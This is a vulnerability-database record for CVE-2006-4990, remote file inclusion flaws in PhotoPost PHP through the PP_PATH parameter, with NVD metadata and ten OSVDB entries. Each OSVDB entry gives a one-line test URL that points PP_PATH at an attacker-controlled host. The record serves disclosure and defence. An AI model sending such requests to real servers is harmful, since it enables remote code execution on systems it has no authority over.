Search...

CVE-2006-4990

2006-09-25T22:07:00

ID CVE-2006-4990
Type cve
Reporter NVD
Modified 2018-10-17T17:40:46

Description

Multiple PHP remote file inclusion vulnerabilities in PhotoPost allow remote attackers to execute arbitrary PHP code via a URL in the PP_PATH parameter in (1) addfav.php, (2) adm-admlog.php, (3) adm-approve.php, (4) adm-backup.php, (5) adm-cats.php, (6) adm-cinc.php, (7) adm-db.php, (8) adm-editcfg.php, (9) adm-inc.php, (10) adm-index.php, (11) adm-modcom.php, (12) adm-move.php, (13) adm-options.php, (14) adm-order.php, (15) adm-pa.php, (16) adm-photo.php, (17) adm-purge.php, (18) adm-style.php, (19) adm-templ.php, (20) adm-userg.php, (21) adm-users.php, (22) bulkupload.php, (23) cookies.php, (24) comments.php, (25) ecard.php, (26) editphoto.php, (27) register.php, (28) showgallery.php, (29) showmembers.php, (30) useralbums.php, (31) uploadphoto.php, (32) search.php, or (33) adm-menu.php, different vectors than CVE-2006-4828.

JSON Vulners Source

Initial Source

{"id": "CVE-2006-4990", "bulletinFamily": "NVD", "title": "CVE-2006-4990", "description": "Multiple PHP remote file inclusion vulnerabilities in PhotoPost allow remote attackers to execute arbitrary PHP code via a URL in the PP_PATH parameter in (1) addfav.php, (2) adm-admlog.php, (3) adm-approve.php, (4) adm-backup.php, (5) adm-cats.php, (6) adm-cinc.php, (7) adm-db.php, (8) adm-editcfg.php, (9) adm-inc.php, (10) adm-index.php, (11) adm-modcom.php, (12) adm-move.php, (13) adm-options.php, (14) adm-order.php, (15) adm-pa.php, (16) adm-photo.php, (17) adm-purge.php, (18) adm-style.php, (19) adm-templ.php, (20) adm-userg.php, (21) adm-users.php, (22) bulkupload.php, (23) cookies.php, (24) comments.php, (25) ecard.php, (26) editphoto.php, (27) register.php, (28) showgallery.php, (29) showmembers.php, (30) useralbums.php, (31) uploadphoto.php, (32) search.php, or (33) adm-menu.php, different vectors than CVE-2006-4828.", "published": "2006-09-25T22:07:00", "modified": "2018-10-17T17:40:46", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4990", "reporter": "NVD", "references": ["http://securityreason.com/securityalert/1632", "http://www.securityfocus.com/archive/1/446224/100/0/threaded"], "cvelist": ["CVE-2006-4990"], "type": "cve", "lastseen": "2018-10-18T15:05:37", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:photopost:photopost_php_pro:4.6", "cpe:/a:photopost:photopost_php_pro:4.5"], "cvelist": ["CVE-2006-4990"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Multiple PHP remote file inclusion vulnerabilities in PhotoPost allow remote attackers to execute arbitrary PHP code via a URL in the PP_PATH parameter in (1) addfav.php, (2) adm-admlog.php, (3) adm-approve.php, (4) adm-backup.php, (5) adm-cats.php, (6) adm-cinc.php, (7) adm-db.php, (8) adm-editcfg.php, (9) adm-inc.php, (10) adm-index.php, (11) adm-modcom.php, (12) adm-move.php, (13) adm-options.php, (14) adm-order.php, (15) adm-pa.php, (16) adm-photo.php, (17) adm-purge.php, (18) adm-style.php, (19) adm-templ.php, (20) adm-userg.php, (21) adm-users.php, (22) bulkupload.php, (23) cookies.php, (24) comments.php, (25) ecard.php, (26) editphoto.php, (27) register.php, (28) showgallery.php, (29) showmembers.php, (30) useralbums.php, (31) uploadphoto.php, (32) search.php, or (33) adm-menu.php, different vectors than CVE-2006-4828.", "edition": 1, "enchantments": {"score": {"modified": "2016-09-03T07:36:53", "value": 7.5, "vector": "NONE"}}, "hash": "b751ae15ef506410ddf19f92eb0d1d23c7520e3348791bd62bb12e5bef20e017", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "a8c18dc354a261810f53b4979f8dee39", "key": "href"}, {"hash": "13594efa29da02af48cb0f9e803ae2b9", "key": "title"}, {"hash": "9ceeeba4d8df1d26b6f7321ea9793d38", "key": "cvelist"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "656ad3ba796b9316b8a2e302c35f15c5", "key": "description"}, {"hash": "de4888b188dbb1886e1931a7762b99fa", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "861c507c925bc5dbbdff89d181050e83", "key": "cpe"}, {"hash": "dfebcb8f42e6b40d92ba6d8350544daa", "key": "references"}, {"hash": "926c118dfdbc9a82fd400cbf9a4bb0d4", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4990", "id": "CVE-2006-4990", "lastseen": "2016-09-03T07:36:53", "modified": "2008-09-05T17:11:05", "objectVersion": "1.2", "published": "2006-09-25T22:07:00", "references": ["http://securityreason.com/securityalert/1632", "http://www.securityfocus.com/archive/1/archive/1/446224/100/0/threaded"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-4990", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T07:36:53"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "861c507c925bc5dbbdff89d181050e83"}, {"key": "cvelist", "hash": "9ceeeba4d8df1d26b6f7321ea9793d38"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "656ad3ba796b9316b8a2e302c35f15c5"}, {"key": "href", "hash": "a8c18dc354a261810f53b4979f8dee39"}, {"key": "modified", "hash": "e9cfc76597246bfedb6f9c05cf673611"}, {"key": "published", "hash": "de4888b188dbb1886e1931a7762b99fa"}, {"key": "references", "hash": "d5e7afd5ba359219984e8dbdd925106c"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "13594efa29da02af48cb0f9e803ae2b9"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c36b599a7b3538ae57bdca9ee3bfd9da82044cee3667bc2fd9c9ae0acb6e97c1", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-10-18T15:05:37"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:32241", "OSVDB:32251", "OSVDB:32239", "OSVDB:32221", "OSVDB:32226", "OSVDB:32236", "OSVDB:32235", "OSVDB:32222", "OSVDB:32231", "OSVDB:32230"]}], "modified": "2018-10-18T15:05:37"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:photopost:photopost_php_pro:4.6", "cpe:/a:photopost:photopost_php_pro:4.5"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}

{"osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-pa.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-pa.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-pa.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32235", "id": "OSVDB:32235", "title": "PhotoPost PHP adm-pa.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-photo.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-photo.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-photo.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32236", "id": "OSVDB:32236", "title": "PhotoPost PHP adm-photo.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-users.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-users.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-users.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32241", "id": "OSVDB:32241", "title": "PhotoPost PHP adm-users.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the addfav.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the addfav.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/addfav.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32221", "id": "OSVDB:32221", "title": "PhotoPost PHP addfav.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-cinc.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-cinc.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-cinc.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32226", "id": "OSVDB:32226", "title": "PhotoPost PHP adm-cinc.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the uploadphoto.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the uploadphoto.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/uploadphoto.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32251", "id": "OSVDB:32251", "title": "PhotoPost PHP uploadphoto.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-templ.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-templ.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-templ.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32239", "id": "OSVDB:32239", "title": "PhotoPost PHP adm-templ.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the ecard.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the ecard.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/ecard.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32245", "id": "OSVDB:32245", "title": "PhotoPost PHP ecard.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-index.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-index.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-index.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32230", "id": "OSVDB:32230", "title": "PhotoPost PHP adm-index.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-modcom.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPhotoPost PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the adm-modcom.php script not properly sanitizing user input supplied to the 'PP_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/adm-modcom.php?PP_PATH=[attacker]?\n## References:\nVendor URL: http://www.photopost.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0272.html\n[CVE-2006-4990](https://vulners.com/cve/CVE-2006-4990)\n", "modified": "2006-09-18T13:40:39", "published": "2006-09-18T13:40:39", "href": "https://vulners.com/osvdb/OSVDB:32231", "id": "OSVDB:32231", "title": "PhotoPost PHP adm-modcom.php PP_PATH Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}